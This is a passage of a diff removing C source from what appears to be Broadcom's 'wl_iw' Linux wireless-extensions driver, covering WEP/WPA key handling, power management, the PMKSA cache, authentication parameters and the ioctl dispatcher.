--			if ((error = dev_wlc_ioctl(dev, WLC_GET_KEY_PRIMARY, &val, sizeof(val))))
--				return error;
--			val = dtoh32(val);
--			if (val)
--				break;
--		}
--	} else
--		key.index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
--
--	if (key.index >= DOT11_MAX_DEFAULT_KEYS)
--		key.index = 0;
--
--	/* Get info */
--
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_WSEC, &wsec, sizeof(wsec))) ||
--	    (error = dev_wlc_ioctl(dev, WLC_GET_AUTH, &auth, sizeof(auth))))
--		return error;
--
--	swap_key_to_BE(&key);
--
--	wsec = dtoh32(wsec);
--	auth = dtoh32(auth);
--	/* Get key length */
--	dwrq->length = MIN(IW_ENCODING_TOKEN_MAX, key.len);
--
--	/* Get flags */
--	dwrq->flags = key.index + 1;
--	if (!(wsec & (WEP_ENABLED | TKIP_ENABLED | AES_ENABLED))) {
--		/* Interpret "off" to mean no encryption */
--		dwrq->flags |= IW_ENCODE_DISABLED;
--	}
--	if (auth) {
--		/* Interpret "restricted" to mean shared key authentication */
--		dwrq->flags |= IW_ENCODE_RESTRICTED;
--	}
--
--	/* Get key */
--	if (dwrq->length && extra)
--		memcpy(extra, key.data, dwrq->length);
--
--	return 0;
--}
--
--static int
--wl_iw_set_power(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, pm;
--
--	WL_TRACE(("%s: SIOCSIWPOWER\n", dev->name));
--
--	pm = vwrq->disabled ? PM_OFF : PM_MAX;
--
--	pm = htod32(pm);
--	if ((error = dev_wlc_ioctl(dev, WLC_SET_PM, &pm, sizeof(pm))))
--		return error;
--
--	return 0;
--}
--
--static int
--wl_iw_get_power(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error, pm;
--
--	WL_TRACE(("%s: SIOCGIWPOWER\n", dev->name));
--
--	if ((error = dev_wlc_ioctl(dev, WLC_GET_PM, &pm, sizeof(pm))))
--		return error;
--
--	pm = dtoh32(pm);
--	vwrq->disabled = pm ? 0 : 1;
--	vwrq->flags = IW_POWER_ALL_R;
--
--	return 0;
--}
--
--#if WIRELESS_EXT > 17
--static int
--wl_iw_set_wpaie(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *iwp,
--	char *extra
--)
--{
--		dev_wlc_bufvar_set(dev, "wpaie", extra, iwp->length);
--
--	return 0;
--}
--
--static int
--wl_iw_get_wpaie(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *iwp,
--	char *extra
--)
--{
--	WL_TRACE(("%s: SIOCGIWGENIE\n", dev->name));
--	iwp->length = 64;
--	dev_wlc_bufvar_get(dev, "wpaie", extra, iwp->length);
--	return 0;
--}
--
--static int
--wl_iw_set_encodeext(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_point *dwrq,
--	char *extra
--)
--{
--	wl_wsec_key_t key;
--	int error;
--	struct iw_encode_ext *iwe;
--
--	WL_TRACE(("%s: SIOCSIWENCODEEXT\n", dev->name));
--
--	memset(&key, 0, sizeof(key));
--	iwe = (struct iw_encode_ext *)extra;
--
--	/* disable encryption completely  */
--	if (dwrq->flags & IW_ENCODE_DISABLED) {
--
--	}
--
--	/* get the key index */
--	key.index = 0;
--	if (dwrq->flags & IW_ENCODE_INDEX)
--		key.index = (dwrq->flags & IW_ENCODE_INDEX) - 1;
--
--	key.len = iwe->key_len;
--
--	/* Instead of bcast for ea address for default wep keys, driver needs it to be Null */
--	if (!ETHER_ISMULTI(iwe->addr.sa_data))
--		bcopy((void *)&iwe->addr.sa_data, (char *)&key.ea, ETHER_ADDR_LEN);
--
--	/* check for key index change */
--	if (key.len == 0) {
--		if (iwe->ext_flags & IW_ENCODE_EXT_SET_TX_KEY) {
--			WL_WSEC(("Changing the the primary Key to %d\n", key.index));
--			/* change the key index .... */
--			key.index = htod32(key.index);
--			error = dev_wlc_ioctl(dev, WLC_SET_KEY_PRIMARY,
--				&key.index, sizeof(key.index));
--			if (error)
--				return error;
--		}
--		/* key delete */
--		else {
--			swap_key_from_BE(&key);
--			error = dev_wlc_ioctl(dev, WLC_SET_KEY, &key, sizeof(key));
--			if (error)
--				return error;
--		}
--	}
--	/* This case is used to allow an external 802.1x supplicant
--	 * to pass the PMK to the in-driver supplicant for use in
--	 * the 4-way handshake.
--	 */
--	else if (iwe->alg == IW_ENCODE_ALG_PMK) {
--		int j;
--		wsec_pmk_t pmk;
--		char keystring[WSEC_MAX_PSK_LEN + 1];
--		char* charptr = keystring;
--		uint len;
--
--		/* copy the raw hex key to the appropriate format */
--		for (j = 0; j < (WSEC_MAX_PSK_LEN / 2); j++) {
--			sprintf(charptr, "%02x", iwe->key[j]);
--			charptr += 2;
--		}
--		len = strlen(keystring);
--		pmk.key_len = htod16(len);
--		bcopy(keystring, pmk.key, len);
--		pmk.flags = htod16(WSEC_PASSPHRASE);
--
--		error = dev_wlc_ioctl(dev, WLC_SET_WSEC_PMK, &pmk, sizeof(pmk));
--		if (error)
--			return error;
--	}
--
--	else {
--		if (iwe->key_len > sizeof(key.data))
--			return -EINVAL;
--
--		WL_WSEC(("Setting the key index %d\n", key.index));
--		if (iwe->ext_flags & IW_ENCODE_EXT_SET_TX_KEY) {
--			WL_WSEC(("key is a Primary Key\n"));
--			key.flags = WL_PRIMARY_KEY;
--		}
--
--		bcopy((void *)iwe->key, key.data, iwe->key_len);
--
--		if (iwe->alg == IW_ENCODE_ALG_TKIP) {
--			uint8 keybuf[8];
--			bcopy(&key.data[24], keybuf, sizeof(keybuf));
--			bcopy(&key.data[16], &key.data[24], sizeof(keybuf));
--			bcopy(keybuf, &key.data[16], sizeof(keybuf));
--		}
--
--		/* rx iv */
--		if (iwe->ext_flags & IW_ENCODE_EXT_RX_SEQ_VALID) {
--			uchar *ivptr;
--			ivptr = (uchar *)iwe->rx_seq;
--			key.rxiv.hi = (ivptr[5] << 24) | (ivptr[4] << 16) |
--				(ivptr[3] << 8) | ivptr[2];
--			key.rxiv.lo = (ivptr[1] << 8) | ivptr[0];
--			key.iv_initialized = TRUE;
--		}
--
--		switch (iwe->alg) {
--			case IW_ENCODE_ALG_NONE:
--				key.algo = CRYPTO_ALGO_OFF;
--				break;
--			case IW_ENCODE_ALG_WEP:
--				if (iwe->key_len == WEP1_KEY_SIZE)
--					key.algo = CRYPTO_ALGO_WEP1;
--				else
--					key.algo = CRYPTO_ALGO_WEP128;
--				break;
--			case IW_ENCODE_ALG_TKIP:
--				key.algo = CRYPTO_ALGO_TKIP;
--				break;
--			case IW_ENCODE_ALG_CCMP:
--				key.algo = CRYPTO_ALGO_AES_CCM;
--				break;
--			default:
--				break;
--		}
--		swap_key_from_BE(&key);
--
--		dhd_wait_pend8021x(dev);
--
--		error = dev_wlc_ioctl(dev, WLC_SET_KEY, &key, sizeof(key));
--		if (error)
--			return error;
--	}
--	return 0;
--}
--
--
--#if WIRELESS_EXT > 17
--struct {
--	pmkid_list_t pmkids;
--	pmkid_t foo[MAXPMKID-1];
--} pmkid_list;
--static int
--wl_iw_set_pmksa(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	struct iw_pmksa *iwpmksa;
--	uint i;
--	char eabuf[ETHER_ADDR_STR_LEN];
--	pmkid_t * pmkid_array = pmkid_list.pmkids.pmkid;
--
--	WL_TRACE(("%s: SIOCSIWPMKSA\n", dev->name));
--	iwpmksa = (struct iw_pmksa *)extra;
--	bzero((char *)eabuf, ETHER_ADDR_STR_LEN);
--	if (iwpmksa->cmd == IW_PMKSA_FLUSH) {
--		WL_TRACE(("wl_iw_set_pmksa - IW_PMKSA_FLUSH\n"));
--		bzero((char *)&pmkid_list, sizeof(pmkid_list));
--	}
--	if (iwpmksa->cmd == IW_PMKSA_REMOVE) {
--		pmkid_list_t pmkid, *pmkidptr;
--		pmkidptr = &pmkid;
--		bcopy(&iwpmksa->bssid.sa_data[0], &pmkidptr->pmkid[0].BSSID, ETHER_ADDR_LEN);
--		bcopy(&iwpmksa->pmkid[0], &pmkidptr->pmkid[0].PMKID, WPA2_PMKID_LEN);
--		{
--			uint j;
--			WL_TRACE(("wl_iw_set_pmksa,IW_PMKSA_REMOVE - PMKID: %s = ",
--				bcm_ether_ntoa(&pmkidptr->pmkid[0].BSSID,
--				eabuf)));
--			for (j = 0; j < WPA2_PMKID_LEN; j++)
--				WL_TRACE(("%02x ", pmkidptr->pmkid[0].PMKID[j]));
--			WL_TRACE(("\n"));
--		}
--		for (i = 0; i < pmkid_list.pmkids.npmkid; i++)
--			if (!bcmp(&iwpmksa->bssid.sa_data[0], &pmkid_array[i].BSSID,
--				ETHER_ADDR_LEN))
--				break;
--		for (; i < pmkid_list.pmkids.npmkid; i++) {
--			bcopy(&pmkid_array[i+1].BSSID,
--				&pmkid_array[i].BSSID,
--				ETHER_ADDR_LEN);
--			bcopy(&pmkid_array[i+1].PMKID,
--				&pmkid_array[i].PMKID,
--				WPA2_PMKID_LEN);
--		}
--		pmkid_list.pmkids.npmkid--;
--	}
--	if (iwpmksa->cmd == IW_PMKSA_ADD) {
--		bcopy(&iwpmksa->bssid.sa_data[0],
--			&pmkid_array[pmkid_list.pmkids.npmkid].BSSID,
--			ETHER_ADDR_LEN);
--		bcopy(&iwpmksa->pmkid[0], &pmkid_array[pmkid_list.pmkids.npmkid].PMKID,
--			WPA2_PMKID_LEN);
--		{
--			uint j;
--			uint k;
--			k = pmkid_list.pmkids.npmkid;
--			BCM_REFERENCE(k);
--			WL_TRACE(("wl_iw_set_pmksa,IW_PMKSA_ADD - PMKID: %s = ",
--				bcm_ether_ntoa(&pmkid_array[k].BSSID,
--				eabuf)));
--			for (j = 0; j < WPA2_PMKID_LEN; j++)
--				WL_TRACE(("%02x ", pmkid_array[k].PMKID[j]));
--			WL_TRACE(("\n"));
--		}
--		pmkid_list.pmkids.npmkid++;
--	}
--	WL_TRACE(("PRINTING pmkid LIST - No of elements %d\n", pmkid_list.pmkids.npmkid));
--	for (i = 0; i < pmkid_list.pmkids.npmkid; i++) {
--		uint j;
--		WL_TRACE(("PMKID[%d]: %s = ", i,
--			bcm_ether_ntoa(&pmkid_array[i].BSSID,
--			eabuf)));
--		for (j = 0; j < WPA2_PMKID_LEN; j++)
--			WL_TRACE(("%02x ", pmkid_array[i].PMKID[j]));
--		printf("\n");
--	}
--	WL_TRACE(("\n"));
--	dev_wlc_bufvar_set(dev, "pmkid_info", (char *)&pmkid_list, sizeof(pmkid_list));
--	return 0;
--}
--#endif /* WIRELESS_EXT > 17 */
--
--static int
--wl_iw_get_encodeext(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	WL_TRACE(("%s: SIOCGIWENCODEEXT\n", dev->name));
--	return 0;
--}
--
--static int
--wl_iw_set_wpaauth(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error = 0;
--	int paramid;
--	int paramval;
--	uint32 cipher_combined;
--	int val = 0;
--	wl_iw_t *iw = IW_DEV_IF(dev);
--
--	WL_TRACE(("%s: SIOCSIWAUTH\n", dev->name));
--
--	paramid = vwrq->flags & IW_AUTH_INDEX;
--	paramval = vwrq->value;
--
--	WL_TRACE(("%s: SIOCSIWAUTH, paramid = 0x%0x, paramval = 0x%0x\n",
--		dev->name, paramid, paramval));
--
--	switch (paramid) {
--
--	case IW_AUTH_WPA_VERSION:
--		/* supported wpa version disabled or wpa or wpa2 */
--		if (paramval & IW_AUTH_WPA_VERSION_DISABLED)
--			val = WPA_AUTH_DISABLED;
--		else if (paramval & (IW_AUTH_WPA_VERSION_WPA))
--			val = WPA_AUTH_PSK | WPA_AUTH_UNSPECIFIED;
--		else if (paramval & IW_AUTH_WPA_VERSION_WPA2)
--			val = WPA2_AUTH_PSK | WPA2_AUTH_UNSPECIFIED;
--		WL_TRACE(("%s: %d: setting wpa_auth to 0x%0x\n", __FUNCTION__, __LINE__, val));
--		if ((error = dev_wlc_intvar_set(dev, "wpa_auth", val)))
--			return error;
--		break;
--
--	case IW_AUTH_CIPHER_PAIRWISE:
--	case IW_AUTH_CIPHER_GROUP: {
--		int fbt_cap = 0;
--
--		if (paramid == IW_AUTH_CIPHER_PAIRWISE) {
--			iw->pwsec = paramval;
--		}
--		else {
--			iw->gwsec = paramval;
--		}
--
--		if ((error = dev_wlc_intvar_get(dev, "wsec", &val)))
--			return error;
--
--		cipher_combined = iw->gwsec | iw->pwsec;
--		val &= ~(WEP_ENABLED | TKIP_ENABLED | AES_ENABLED);
--		if (cipher_combined & (IW_AUTH_CIPHER_WEP40 | IW_AUTH_CIPHER_WEP104))
--			val |= WEP_ENABLED;
--		if (cipher_combined & IW_AUTH_CIPHER_TKIP)
--			val |= TKIP_ENABLED;
--		if (cipher_combined & IW_AUTH_CIPHER_CCMP)
--			val |= AES_ENABLED;
--
--		if (iw->privacy_invoked && !val) {
--			WL_WSEC(("%s: %s: 'Privacy invoked' TRUE but clearing wsec, assuming "
--			         "we're a WPS enrollee\n", dev->name, __FUNCTION__));
--			if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", TRUE))) {
--				WL_WSEC(("Failed to set iovar is_WPS_enrollee\n"));
--				return error;
--			}
--		} else if (val) {
--			if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", FALSE))) {
--				WL_WSEC(("Failed to clear iovar is_WPS_enrollee\n"));
--				return error;
--			}
--		}
--
--		if ((error = dev_wlc_intvar_set(dev, "wsec", val)))
--			return error;
--
--		/* Ensure in-dongle supplicant is turned on when FBT wants to do the 4-way
--		 * handshake.
--		 */
--		if (dev_wlc_intvar_get(dev, "fbt_cap", &fbt_cap) == 0) {
--			if (fbt_cap == WLC_FBT_CAP_DRV_4WAY_AND_REASSOC) {
--				if ((paramid == IW_AUTH_CIPHER_PAIRWISE) && (val & AES_ENABLED)) {
--					if ((error = dev_wlc_intvar_set(dev, "sup_wpa", 1)))
--						return error;
--				}
--				else if (val == 0) {
--					if ((error = dev_wlc_intvar_set(dev, "sup_wpa", 0)))
--						return error;
--				}
--			}
--		}
--		break;
--	}
--
--	case IW_AUTH_KEY_MGMT:
--		if ((error = dev_wlc_intvar_get(dev, "wpa_auth", &val)))
--			return error;
--
--		if (val & (WPA_AUTH_PSK | WPA_AUTH_UNSPECIFIED)) {
--			if (paramval & (IW_AUTH_KEY_MGMT_FT_PSK | IW_AUTH_KEY_MGMT_PSK))
--				val = WPA_AUTH_PSK;
--			else
--				val = WPA_AUTH_UNSPECIFIED;
--			if (paramval & (IW_AUTH_KEY_MGMT_FT_802_1X | IW_AUTH_KEY_MGMT_FT_PSK))
--				val |= WPA2_AUTH_FT;
--		}
--		else if (val & (WPA2_AUTH_PSK | WPA2_AUTH_UNSPECIFIED)) {
--			if (paramval & (IW_AUTH_KEY_MGMT_FT_PSK | IW_AUTH_KEY_MGMT_PSK))
--				val = WPA2_AUTH_PSK;
--			else
--				val = WPA2_AUTH_UNSPECIFIED;
--			if (paramval & (IW_AUTH_KEY_MGMT_FT_802_1X | IW_AUTH_KEY_MGMT_FT_PSK))
--				val |= WPA2_AUTH_FT;
--		}
--		WL_TRACE(("%s: %d: setting wpa_auth to %d\n", __FUNCTION__, __LINE__, val));
--		if ((error = dev_wlc_intvar_set(dev, "wpa_auth", val)))
--			return error;
--		break;
--
--	case IW_AUTH_TKIP_COUNTERMEASURES:
--		dev_wlc_bufvar_set(dev, "tkip_countermeasures", (char *)&paramval, 1);
--		break;
--
--	case IW_AUTH_80211_AUTH_ALG:
--		/* open shared */
--		WL_ERROR(("Setting the D11auth %d\n", paramval));
--		if (paramval & IW_AUTH_ALG_OPEN_SYSTEM)
--			val = 0;
--		else if (paramval & IW_AUTH_ALG_SHARED_KEY)
--			val = 1;
--		else
--			error = 1;
--		if (!error && (error = dev_wlc_intvar_set(dev, "auth", val)))
--			return error;
--		break;
--
--	case IW_AUTH_WPA_ENABLED:
--		if (paramval == 0) {
--			val = 0;
--			WL_TRACE(("%s: %d: setting wpa_auth to %d\n", __FUNCTION__, __LINE__, val));
--			error = dev_wlc_intvar_set(dev, "wpa_auth", val);
--			return error;
--		}
--		else {
--			/* If WPA is enabled, wpa_auth is set elsewhere */
--		}
--		break;
--
--	case IW_AUTH_DROP_UNENCRYPTED:
--		dev_wlc_bufvar_set(dev, "wsec_restrict", (char *)&paramval, 1);
--		break;
--
--	case IW_AUTH_RX_UNENCRYPTED_EAPOL:
--		dev_wlc_bufvar_set(dev, "rx_unencrypted_eapol", (char *)&paramval, 1);
--		break;
--
--#if WIRELESS_EXT > 17
--
--	case IW_AUTH_ROAMING_CONTROL:
--		WL_TRACE(("%s: IW_AUTH_ROAMING_CONTROL\n", __FUNCTION__));
--		/* driver control or user space app control */
--		break;
--
--	case IW_AUTH_PRIVACY_INVOKED: {
--		int wsec;
--
--		if (paramval == 0) {
--			iw->privacy_invoked = FALSE;
--			if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", FALSE))) {
--				WL_WSEC(("Failed to clear iovar is_WPS_enrollee\n"));
--				return error;
--			}
--		} else {
--			iw->privacy_invoked = TRUE;
--			if ((error = dev_wlc_intvar_get(dev, "wsec", &wsec)))
--				return error;
--
--			if (!WSEC_ENABLED(wsec)) {
--				/* if privacy is true, but wsec is false, we are a WPS enrollee */
--				if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", TRUE))) {
--					WL_WSEC(("Failed to set iovar is_WPS_enrollee\n"));
--					return error;
--				}
--			} else {
--				if ((error = dev_wlc_intvar_set(dev, "is_WPS_enrollee", FALSE))) {
--					WL_WSEC(("Failed to clear iovar is_WPS_enrollee\n"));
--					return error;
--				}
--			}
--		}
--		break;
--	}
--
--
--#endif /* WIRELESS_EXT > 17 */
--
--
--	default:
--		break;
--	}
--	return 0;
--}
--#define VAL_PSK(_val) (((_val) & WPA_AUTH_PSK) || ((_val) & WPA2_AUTH_PSK))
--
--static int
--wl_iw_get_wpaauth(
--	struct net_device *dev,
--	struct iw_request_info *info,
--	struct iw_param *vwrq,
--	char *extra
--)
--{
--	int error;
--	int paramid;
--	int paramval = 0;
--	int val;
--	wl_iw_t *iw = IW_DEV_IF(dev);
--
--	WL_TRACE(("%s: SIOCGIWAUTH\n", dev->name));
--
--	paramid = vwrq->flags & IW_AUTH_INDEX;
--
--	switch (paramid) {
--	case IW_AUTH_WPA_VERSION:
--		/* supported wpa version disabled or wpa or wpa2 */
--		if ((error = dev_wlc_intvar_get(dev, "wpa_auth", &val)))
--			return error;
--		if (val & (WPA_AUTH_NONE | WPA_AUTH_DISABLED))
--			paramval = IW_AUTH_WPA_VERSION_DISABLED;
--		else if (val & (WPA_AUTH_PSK | WPA_AUTH_UNSPECIFIED))
--			paramval = IW_AUTH_WPA_VERSION_WPA;
--		else if (val & (WPA2_AUTH_PSK | WPA2_AUTH_UNSPECIFIED))
--			paramval = IW_AUTH_WPA_VERSION_WPA2;
--		break;
--
--	case IW_AUTH_CIPHER_PAIRWISE:
--		paramval = iw->pwsec;
--		break;
--
--	case IW_AUTH_CIPHER_GROUP:
--		paramval = iw->gwsec;
--		break;
--
--	case IW_AUTH_KEY_MGMT:
--		/* psk, 1x */
--		if ((error = dev_wlc_intvar_get(dev, "wpa_auth", &val)))
--			return error;
--		if (VAL_PSK(val))
--			paramval = IW_AUTH_KEY_MGMT_PSK;
--		else
--			paramval = IW_AUTH_KEY_MGMT_802_1X;
--
--		break;
--	case IW_AUTH_TKIP_COUNTERMEASURES:
--		dev_wlc_bufvar_get(dev, "tkip_countermeasures", (char *)&paramval, 1);
--		break;
--
--	case IW_AUTH_DROP_UNENCRYPTED:
--		dev_wlc_bufvar_get(dev, "wsec_restrict", (char *)&paramval, 1);
--		break;
--
--	case IW_AUTH_RX_UNENCRYPTED_EAPOL:
--		dev_wlc_bufvar_get(dev, "rx_unencrypted_eapol", (char *)&paramval, 1);
--		break;
--
--	case IW_AUTH_80211_AUTH_ALG:
--		/* open, shared, leap */
--		if ((error = dev_wlc_intvar_get(dev, "auth", &val)))
--			return error;
--		if (!val)
--			paramval = IW_AUTH_ALG_OPEN_SYSTEM;
--		else
--			paramval = IW_AUTH_ALG_SHARED_KEY;
--		break;
--	case IW_AUTH_WPA_ENABLED:
--		if ((error = dev_wlc_intvar_get(dev, "wpa_auth", &val)))
--			return error;
--		if (val)
--			paramval = TRUE;
--		else
--			paramval = FALSE;
--		break;
--
--#if WIRELESS_EXT > 17
--
--	case IW_AUTH_ROAMING_CONTROL:
--		WL_ERROR(("%s: IW_AUTH_ROAMING_CONTROL\n", __FUNCTION__));
--		/* driver control or user space app control */
--		break;
--
--	case IW_AUTH_PRIVACY_INVOKED:
--		paramval = iw->privacy_invoked;
--		break;
--
--#endif /* WIRELESS_EXT > 17 */
--	}
--	vwrq->value = paramval;
--	return 0;
--}
--#endif /* WIRELESS_EXT > 17 */
--
--static const iw_handler wl_iw_handler[] =
--{
--	(iw_handler) wl_iw_config_commit,	/* SIOCSIWCOMMIT */
--	(iw_handler) wl_iw_get_name,		/* SIOCGIWNAME */
--	(iw_handler) NULL,			/* SIOCSIWNWID */
--	(iw_handler) NULL,			/* SIOCGIWNWID */
--	(iw_handler) wl_iw_set_freq,		/* SIOCSIWFREQ */
--	(iw_handler) wl_iw_get_freq,		/* SIOCGIWFREQ */
--	(iw_handler) wl_iw_set_mode,		/* SIOCSIWMODE */
--	(iw_handler) wl_iw_get_mode,		/* SIOCGIWMODE */
--	(iw_handler) NULL,			/* SIOCSIWSENS */
--	(iw_handler) NULL,			/* SIOCGIWSENS */
--	(iw_handler) NULL,			/* SIOCSIWRANGE */
--	(iw_handler) wl_iw_get_range,		/* SIOCGIWRANGE */
--	(iw_handler) NULL,			/* SIOCSIWPRIV */
--	(iw_handler) NULL,			/* SIOCGIWPRIV */
--	(iw_handler) NULL,			/* SIOCSIWSTATS */
--	(iw_handler) NULL,			/* SIOCGIWSTATS */
--	(iw_handler) wl_iw_set_spy,		/* SIOCSIWSPY */
--	(iw_handler) wl_iw_get_spy,		/* SIOCGIWSPY */
--	(iw_handler) NULL,			/* -- hole -- */
--	(iw_handler) NULL,			/* -- hole -- */
--	(iw_handler) wl_iw_set_wap,		/* SIOCSIWAP */
--	(iw_handler) wl_iw_get_wap,		/* SIOCGIWAP */
--#if WIRELESS_EXT > 17
--	(iw_handler) wl_iw_mlme,		/* SIOCSIWMLME */
--#else
--	(iw_handler) NULL,			/* -- hole -- */
--#endif
--	(iw_handler) wl_iw_iscan_get_aplist,	/* SIOCGIWAPLIST */
--#if WIRELESS_EXT > 13
--	(iw_handler) wl_iw_iscan_set_scan,	/* SIOCSIWSCAN */
--	(iw_handler) wl_iw_iscan_get_scan,	/* SIOCGIWSCAN */
--#else	/* WIRELESS_EXT > 13 */
--	(iw_handler) NULL,			/* SIOCSIWSCAN */
--	(iw_handler) NULL,			/* SIOCGIWSCAN */
--#endif	/* WIRELESS_EXT > 13 */
--	(iw_handler) wl_iw_set_essid,		/* SIOCSIWESSID */
--	(iw_handler) wl_iw_get_essid,		/* SIOCGIWESSID */
--	(iw_handler) wl_iw_set_nick,		/* SIOCSIWNICKN */
--	(iw_handler) wl_iw_get_nick,		/* SIOCGIWNICKN */
--	(iw_handler) NULL,			/* -- hole -- */
--	(iw_handler) NULL,			/* -- hole -- */
--	(iw_handler) wl_iw_set_rate,		/* SIOCSIWRATE */
--	(iw_handler) wl_iw_get_rate,		/* SIOCGIWRATE */
--	(iw_handler) wl_iw_set_rts,		/* SIOCSIWRTS */
--	(iw_handler) wl_iw_get_rts,		/* SIOCGIWRTS */
--	(iw_handler) wl_iw_set_frag,		/* SIOCSIWFRAG */
--	(iw_handler) wl_iw_get_frag,		/* SIOCGIWFRAG */
--	(iw_handler) wl_iw_set_txpow,		/* SIOCSIWTXPOW */
--	(iw_handler) wl_iw_get_txpow,		/* SIOCGIWTXPOW */
--#if WIRELESS_EXT > 10
--	(iw_handler) wl_iw_set_retry,		/* SIOCSIWRETRY */
--	(iw_handler) wl_iw_get_retry,		/* SIOCGIWRETRY */
--#endif /* WIRELESS_EXT > 10 */
--	(iw_handler) wl_iw_set_encode,		/* SIOCSIWENCODE */
--	(iw_handler) wl_iw_get_encode,		/* SIOCGIWENCODE */
--	(iw_handler) wl_iw_set_power,		/* SIOCSIWPOWER */
--	(iw_handler) wl_iw_get_power,		/* SIOCGIWPOWER */
--#if WIRELESS_EXT > 17
--	(iw_handler) NULL,			/* -- hole -- */
--	(iw_handler) NULL,			/* -- hole -- */
--	(iw_handler) wl_iw_set_wpaie,		/* SIOCSIWGENIE */
--	(iw_handler) wl_iw_get_wpaie,		/* SIOCGIWGENIE */
--	(iw_handler) wl_iw_set_wpaauth,		/* SIOCSIWAUTH */
--	(iw_handler) wl_iw_get_wpaauth,		/* SIOCGIWAUTH */
--	(iw_handler) wl_iw_set_encodeext,	/* SIOCSIWENCODEEXT */
--	(iw_handler) wl_iw_get_encodeext,	/* SIOCGIWENCODEEXT */
--	(iw_handler) wl_iw_set_pmksa,		/* SIOCSIWPMKSA */
--#endif /* WIRELESS_EXT > 17 */
--};
--
--#if WIRELESS_EXT > 12
--enum {
--	WL_IW_SET_LEDDC = SIOCIWFIRSTPRIV,
--	WL_IW_SET_VLANMODE,
--	WL_IW_SET_PM,
--#if WIRELESS_EXT > 17
--#endif /* WIRELESS_EXT > 17 */
--	WL_IW_SET_LAST
--};
--
--static iw_handler wl_iw_priv_handler[] = {
--	wl_iw_set_leddc,
--	wl_iw_set_vlanmode,
--	wl_iw_set_pm,
--#if WIRELESS_EXT > 17
--#endif /* WIRELESS_EXT > 17 */
--	NULL
--};
--
--static struct iw_priv_args wl_iw_priv_args[] = {
--	{
--		WL_IW_SET_LEDDC,
--		IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
--		0,
--		"set_leddc"
--	},
--	{
--		WL_IW_SET_VLANMODE,
--		IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
--		0,
--		"set_vlanmode"
--	},
--	{
--		WL_IW_SET_PM,
--		IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
--		0,
--		"set_pm"
--	},
--#if WIRELESS_EXT > 17
--#endif /* WIRELESS_EXT > 17 */
--	{ 0, 0, 0, { 0 } }
--};
--
--const struct iw_handler_def wl_iw_handler_def =
--{
--	.num_standard = ARRAYSIZE(wl_iw_handler),
--	.num_private = ARRAY_SIZE(wl_iw_priv_handler),
--	.num_private_args = ARRAY_SIZE(wl_iw_priv_args),
--	.standard = (iw_handler *) wl_iw_handler,
--	.private = wl_iw_priv_handler,
--	.private_args = wl_iw_priv_args,
--#if WIRELESS_EXT >= 19
--	get_wireless_stats: dhd_get_wireless_stats,
--#endif /* WIRELESS_EXT >= 19 */
--	};
--#endif /* WIRELESS_EXT > 12 */
--
--int
--wl_iw_ioctl(
--	struct net_device *dev,
--	struct ifreq *rq,
--	int cmd
--)
--{
--	struct iwreq *wrq = (struct iwreq *) rq;
--	struct iw_request_info info;
--	iw_handler handler;
--	char *extra = NULL;
--	size_t token_size = 1;
--	int max_tokens = 0, ret = 0;
--
--	if (cmd < SIOCIWFIRST ||
--		IW_IOCTL_IDX(cmd) >= ARRAYSIZE(wl_iw_handler) ||
--		!(handler = wl_iw_handler[IW_IOCTL_IDX(cmd)]))
--		return -EOPNOTSUPP;
--
--	switch (cmd) {
--
--	case SIOCSIWESSID:
--	case SIOCGIWESSID:
--	case SIOCSIWNICKN:
--	case SIOCGIWNICKN:
--		max_tokens = IW_ESSID_MAX_SIZE + 1;
--		break;
--
--	case SIOCSIWENCODE:
--	case SIOCGIWENCODE:
--#if WIRELESS_EXT > 17
--	case SIOCSIWENCODEEXT:
--	case SIOCGIWENCODEEXT:
--#endif
--		max_tokens = IW_ENCODING_TOKEN_MAX;
--		break;
--
--	case SIOCGIWRANGE:
--		max_tokens = sizeof(struct iw_range);
--		break;
--
--	case SIOCGIWAPLIST:
--		token_size = sizeof(struct sockaddr) + sizeof(struct iw_quality);
--		max_tokens = IW_MAX_AP;
--		break;
--
--#if WIRELESS_EXT > 13
--	case SIOCGIWSCAN:
--	if (g_iscan)
--		max_tokens = wrq->u.data.length;
--	else
--		max_tokens = IW_SCAN_MAX_DATA;
--		break;
--#endif /* WIRELESS_EXT > 13 */
--
--	case SIOCSIWSPY:
--		token_size = sizeof(struct sockaddr);
--		max_tokens = IW_MAX_SPY;
--		break;
--
--	case SIOCGIWSPY:
--		token_size = sizeof(struct sockaddr) + sizeof(struct iw_quality);
--		max_tokens = IW_MAX_SPY;
--		break;
--	default:
--		break;
--	}
--
--	if (max_tokens && wrq->u.data.pointer) {
--		if (wrq->u.data.length > max_tokens)
--			return -E2BIG;
--
--		if (!(extra = kmalloc(max_tokens * token_size, GFP_KERNEL)))
--			return -ENOMEM;
--
--		if (copy_from_user(extra, wrq->u.data.pointer, wrq->u.data.length * token_size)) {
--			kfree(extra);
--			return -EFAULT;
--		}
--	}
--
--	info.cmd = cmd;
--	info.flags = 0;
--
--	ret = handler(dev, &info, &wrq->u, extra);
--
--	if (extra) {
--		if (copy_to_user(wrq->u.data.pointer, extra, wrq->u.data.length * token_size)) {
--			kfree(extra);
--			return -EFAULT;
--		}
--
--		kfree(extra);
--	}
--
--	return ret;
--}
--
--/* Convert a connection status event into a connection status string.
-- * Returns TRUE if a matching connection status string was found.
-- */
--bool
--wl_iw_conn_status_str(uint32 event_type, uint32 status, uint32 reason,
--	char* stringBuf, uint buflen)
--{
--	typedef struct conn_fail_event_map_t {
